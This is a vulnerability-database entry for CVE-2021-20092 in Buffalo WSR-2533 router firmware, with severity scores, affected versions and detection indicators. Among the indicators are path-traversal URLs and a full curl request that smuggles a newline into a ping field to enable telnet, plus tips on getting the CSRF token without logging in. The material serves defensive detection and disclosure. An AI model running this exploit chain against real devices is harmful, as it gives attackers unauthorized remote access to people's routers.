cbcvebase.
CVE-2021-20092
published 2021-04-29

CVE-2021-20092: The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly restrict access to sensitive…

PriorityP276high7.5CVSS 3.1
AVNACLPRNUINSUCHINAN
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
8.17%
94.2th percentile
The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly restrict access to sensitive information from an unauthorized actor.

Affected

2 ranges
VendorProductVersion rangeFixed in
buffalowsr-2533dhp3-bk_firmware<= 1.24
buffalowsr-2533dhpl2-bk_firmware<= 1.02

Detection & IOCsextracted from sources · hover to see the quote

url/images/..%2finfo.html
url/images/..%2fcgi/cgi_i_filter.js
path/cgi/cgi_i_filter.js
commandcurl --include -X POST http://<router>/apply_abstract.cgi -H "Referer: http://<router>/ping.html" --data "action=start_ping&httoken=<token>&submit_button=ping.html&action_params=blink_time%3D5&ARC_ping_ipaddress=%0AARC_SYS_TelnetdEnable=1&ARC_ping_status=0&TMP_Ping_Type=4"
path/apply_abstract.cgi
path/loginerror.html
yara
matchers: word header 'application/x-javascript'; word body '/*DEMO*/' AND 'addCfg('
  • The CSRF token parameter is named 'httoken' on Buffalo/Arcadyan devices; it is required for POST requests to /cgi/ endpoints and can be obtained unauthenticated from /loginerror.html via the getToken() JS function.
  • The HTTP Server banner 'Arcadyan httpd 1.0' identifies vulnerable Arcadyan-based firmware across multiple vendor devices.
  • CVE-2021-20091 chained exploit: POST to /apply_abstract.cgi with ARC_ping_ipaddress containing a newline (%0A) and ARC_SYS_TelnetdEnable=1 enables telnet on the device.
  • ·CVE-2021-20091 and CVE-2021-20092 have only been confirmed on Buffalo WSR-2533 models, while CVE-2021-20090 (path traversal auth bypass) affects the broader list of Arcadyan-based devices.
  • ·To have protected pages load properly through the bypass, proxy match/replace must be used so that all sub-resources also leverage the ..%2f path traversal prefix.
  • ·Requests to /cgi/ endpoints will fail if the Referer header itself contains the ..%2f traversal string; the Referer must point to a clean path (e.g., /loginerror.html or /ping.html).

CVSS provenance

nvdv3.17.5HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:P/I:N/A:N
vulncheck7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.